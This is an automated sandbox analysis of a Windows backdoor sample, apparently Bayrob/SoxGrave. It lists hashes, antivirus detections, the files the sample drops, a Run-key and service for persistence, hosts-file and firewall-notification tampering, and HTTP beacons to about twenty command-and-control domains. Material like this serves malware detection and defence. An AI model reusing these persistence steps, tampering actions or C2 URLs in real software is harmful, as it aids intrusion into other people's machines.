Analysis Date | 2015-09-15 15:36:32 |
---|---|
MD5 | a67297798c188b224d858f38ce2f381b |
SHA1 | ffd4a50c0721b4908cc9cac48810fb468d2c1adf |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: ffd85d76763a3346c12b6b0757150478 sha1: a84e6db75d2f7f18dcf020cf091f3badae918ca2 size: 1223168 | |
Section | .rdata md5: 0a1e95db6195eaa75d59577835a9fe55 sha1: 1be1bf7ceeb37dadcc74d7e939b149131e635cdb size: 321536 | |
Section | .data md5: 3099300fca511d47e26944db2d46b29b sha1: a2647d4cbf52fe6dc3b5546b9ceee81c1815b9ef size: 8192 | |
Section | .reloc md5: a3953f2a61838eaa65c4a932d168f7fd sha1: 2737fd215a0b7697c26aac9bda13bb94b161291b size: 160256 | |
Timestamp | 2015-05-11 04:37:16 | |
Packer | VC8 -> Microsoft Corporation | |
PEhash | f6126c46fd877d44a4e4fb571cdd1ef5cf23b990 | |
IMPhash | 985e81f3267377bd9755c939bc62c7bd | |
AV | Rising | 0x59002d5f |
AV | CA (E-Trust Ino) | no_virus |
AV | F-Secure | Gen:Variant.Diley.1 |
AV | Dr. Web | Trojan.Bayrob.5 |
AV | ClamAV | no_virus |
AV | Arcabit (arcavir) | Gen:Variant.Diley.1 |
AV | BullGuard | Gen:Variant.Diley.1 |
AV | Padvish | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
AV | CAT (quickheal) | no_virus |
AV | Trend Micro | no_virus |
AV | Kaspersky | Backdoor.Win32.SoxGrave.bxy |
AV | Zillya! | no_virus |
AV | Emsisoft | Gen:Variant.Diley.1 |
AV | Ikarus | Trojan.Win32.Bayrob |
AV | Frisk (f-prot) | no_virus |
AV | Authentium | W32/SoxGrave.A.gen!Eldorado |
AV | MalwareBytes | no_virus |
AV | MicroWorld (escan) | Gen:Variant.Diley.1 |
AV | Microsoft Security Essentials | Trojan:Win32/Dynamer!ac |
AV | K7 | Trojan ( 004c77f41 ) |
AV | BitDefender | Gen:Variant.Diley.1 |
AV | Fortinet | W32/Bayrob.X!tr |
AV | Symantec | Downloader.Upatre!g15 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Eset (nod32) | Win32/Bayrob.Z |
AV | Alwil (avast) | Dropper-OJQ [Drp] |
AV | Ad-Aware | Gen:Variant.Diley.1 |
AV | Twister | no_virus |
AV | Avira (antivir) | TR/Crypt.Xpack.277318 |
AV | Mcafee | Trojan-FGIJ!A67297798C18 |
Runtime Details:
Process
↳ C:\malware.exe
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SPP Bus Control Engine Alerts Fax Gateway List ➝ C:\WINDOWS\system32\wonfykgn.exe |
---|---|
Creates File | C:\WINDOWS\system32\mkueqvu\etc |
Creates File | C:\WINDOWS\system32\drivers\etc\hosts |
Creates File | C:\WINDOWS\system32\mkueqvu\lck |
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
Creates File | C:\WINDOWS\system32\wonfykgn.exe |
Deletes File | C:\WINDOWS\system32\\drivers\etc\hosts |
Creates Process | C:\WINDOWS\system32\wonfykgn.exe |
Creates Service | Thread Reporting Fax Provider Policy IP - C:\WINDOWS\system32\wonfykgn.exe |
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ Pid 808
Process
↳ Pid 856
Process
↳ C:\WINDOWS\System32\svchost.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL |
---|---|
Creates File | PIPE\lsarpc |
Creates File | C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG |
Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
Process
↳ Pid 1212
Process
↳ Pid 1324
Process
↳ Pid 1868
Process
↳ Pid 1172
Process
↳ C:\WINDOWS\system32\wonfykgn.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝ 1 |
---|---|
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
Creates File | C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe |
Creates File | C:\WINDOWS\system32\mkueqvu\rng |
Creates File | pipe\net\NtControlPipe10 |
Creates File | C:\WINDOWS\system32\mkueqvu\lck |
Creates File | C:\WINDOWS\system32\nxwlyxgfyhtu.exe |
Creates File | C:\WINDOWS\system32\mkueqvu\cfg |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\WINDOWS\system32\mkueqvu\run |
Deletes File | C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe |
Creates Process | C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe -r 52144 tcp |
Creates Process | WATCHDOGPROC "c:\windows\system32\wonfykgn.exe" |
Process
↳ C:\WINDOWS\system32\wonfykgn.exe
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
---|
Process
↳ WATCHDOGPROC "c:\windows\system32\wonfykgn.exe"
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
---|
Process
↳ C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe -r 52144 tcp
Network Details:
HTTP GET | http://recordsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://fliersurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://historybright.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://chiefsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://classsurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://thosecontinue.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://throughcontain.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://belongguard.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://maybellinethaddeus.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://kimberleyshavonne.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://naildeep.com/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://riddenstorm.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://destroystorm.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://wheelagree.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://sticktouch.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://lifeform.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://enemyagree.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://lifetouch.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://lifeword.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://mouthword.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://lifeclock.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
Raw Pcap
Strings